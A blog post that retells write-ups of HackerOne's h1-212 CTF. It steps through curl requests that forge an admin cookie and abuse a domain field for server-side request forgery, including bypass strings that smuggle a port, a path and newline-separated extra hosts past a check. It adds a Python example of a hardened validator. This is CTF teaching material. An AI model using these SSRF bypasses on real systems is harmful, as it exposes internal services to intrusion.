Jason Sheh

Learn From h1-212 CTF Writeup


Introduction
Recently I saw on Twitter a small CTF run by HackerOne. It was very interesting. Although I didn't get to attempt it within the allotted time (and, to be honest, I wouldn't have been able to solve it anyway; I'm just not very good at CTFs), I read many write-ups. Each author had a different approach, and I feel I learned a lot from the variety of methods.

The h1-212 CTF

An engineer of acme.org launched a new server for a new admin panel at http://104.236.20.43/. He is completely confident that the server can’t be hacked. He added a tripwire that notifies him when the flag file is read. He also noticed that the default Apache page is still there, but according to him that’s intentional and doesn’t hurt anyone. Your goal? Read the flag!

Key points: acme.org, admin panel, 104.236.20.43

Visiting 104.236.20.43 first shows the default Apache page. In most write-ups the first step was information gathering:
Port scan of the IP

Nmap scan report for 104.236.20.43
Host is up (0.058s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Directory scan
http://104.236.20.43/index.html
http://104.236.20.43/icons/README
http://104.236.20.43/flag

Following the acme.org hint, many people used scan.rb to find virtual hosts bound to the IP; others simply wrote an entry into the hosts file

$ echo "104.236.20.43   admin.acme.org" >> /etc/hosts

Others set the Host header with curl

curl -H 'Host: admin.acme.org' 'http://104.236.20.43/'
curl -I admin.acme.org
HTTP/1.1 200 OK
Date: Thu, 16 Nov 2017 12:05:51 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: admin=no
Content-Type: text/html; charset=UTF-8

Clearly the intent is for us to change admin in the cookie to yes

curl admin.acme.org -b 'admin=yes'
HTTP/1.1 405 Method Not Allowed
Date: Thu, 16 Nov 2017 12:09:15 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=UTF-8

405 Method Not Allowed: change the request method to POST

curl -X POST -I -b 'admin=yes' 'admin.acme.org'
HTTP/1.1 406 Not Acceptable
Date: Thu, 16 Nov 2017 12:16:09 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8

So what is the 406 error? The request's format does not match what the server requires. Here all the possibilities have to be tried; the one that works is application/json

curl -X POST -H 'Content-Type: application/json' -b 'admin=yes' -d '{"random" : "data"}' 'admin.acme.org'
{"error":{"domain":"required"}}

curl -X POST -H 'Content-Type: application/json' -b 'admin=yes' -d '{"domain" : "admin.acme.org"}' 'admin.acme.org'
{"error":{"domain":"incorrect value, .com domain expected"}}

curl -X POST -H 'Content-Type: application/json' -b 'admin=yes' -d '{"domain" : "213.acme.com"}' 'admin.acme.org'
{"error":{"domain":"incorrect value, sub domain should contain 212"}}

curl -X POST -H 'Content-Type: application/json' -b 'admin=yes' -d '{"domain" : "212.acme.com"}' 'admin.acme.org'
{"next":"\/read.php?id=0"}

curl -b 'admin=yes' 'http://admin.acme.org/read.php?id=0'
{"data":""}

At this point many people's first reaction was to check for SQLi. That line of thinking is correct, but there is no SQLi here. Then many realised that, since we are supplying a hostname and getting information back, this might be SSRF. The domain is restricted to the form 212.*.com, so find a site matching that pattern and test it.

curl -X POST -H 'Content-Type: application/json' -b 'admin=yes' -d '{"domain" : "212.tomnomnom.com"}' 'admin.acme.org'
{"next":"\/read.php?id=2"}

curl -s -H 'Host: admin.acme.org' -H 'Cookie: admin=yes' http://104.236.20.43/read.php?id=2
{"data":"OikK"}

This confirms that SSRF really exists; next, think about how to bypass the restriction to reach the internal network

Via a hostname that satisfies the check but carries a port and path
212.0000003.com:80/.com

Using \n to make the server issue several requests from one value
212.test.com\n127.0.0.1:22\n1234.com

Then scan the internal ports: port 1337 is open, and the flag is stored at 127.0.0.1:1337/flag
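Both bypasses above work because the server only checks that the value starts with "212" and ends with ".com". As an added example (not the write-up's or the challenge's own code), here is that prefix/suffix check next to a hardened validator that rejects ports, paths, control characters and non-public resolution targets; the resolver is a constructed stub (`fake_resolve`) so the example runs offline.

```python
import ipaddress
import re

# Constructed inputs: the two bypass strings from the write-up and two plain
# hostnames used to exercise the resolution check.
BYPASS_PORT_PATH = "212.0000003.com:80/.com"
BYPASS_NEWLINE = "212.test.com\n127.0.0.1:22\n1234.com"

# Stub DNS table for the example (hypothetical; 8.8.8.8 stands in for any public address).
FAKE_DNS = {"212.acme.com": ["8.8.8.8"], "212.internal.com": ["127.0.0.1"]}

def fake_resolve(host):
    """Hypothetical resolver: hostname -> list of IP strings (empty if unknown)."""
    return FAKE_DNS.get(host, [])

LABEL = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)$")

def naive_check(domain):
    """The kind of check the challenge used: a prefix and a suffix, nothing else."""
    return domain.startswith("212") and domain.endswith(".com")

def hardened_check(domain, resolve=fake_resolve):
    """Accept only a bare hostname, matching the policy, that resolves to public IPs."""
    # 1. Only printable ASCII; this alone rejects the \n trick.
    if len(domain) > 253 or not domain.isascii() or not domain.isprintable():
        return False
    # 2. No port, path, userinfo, query or whitespace: a hostname is all we want.
    if any(c in domain for c in ":/\\@?#% \t"):
        return False
    labels = domain.lower().split(".")
    if not all(LABEL.match(label) for label in labels):
        return False
    # 3. The challenge's policy, applied to parsed labels rather than raw string ends.
    if "212" not in labels[0] or labels[-1] != "com":
        return False
    # 4. Resolve and refuse loopback, private, link-local and reserved targets.
    addrs = resolve(domain)
    if not addrs:
        return False
    return all(ipaddress.ip_address(a).is_global for a in addrs)

def compare(domain, resolve=fake_resolve):
    """Return (naive verdict, hardened verdict) for one candidate value."""
    return naive_check(domain), hardened_check(domain, resolve)
```

In a real deployment the address the validator resolved must also be the one the fetcher connects to, otherwise a DNS answer that changes between the check and the request defeats step 4.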

Summary
Fortunately I reproduced the challenge in time; by the time this article was written it was no longer reachable.
Through studying this CTF I saw everyone's different approaches and gained a little understanding of SSRF. I hope I get a chance to take part in one myself.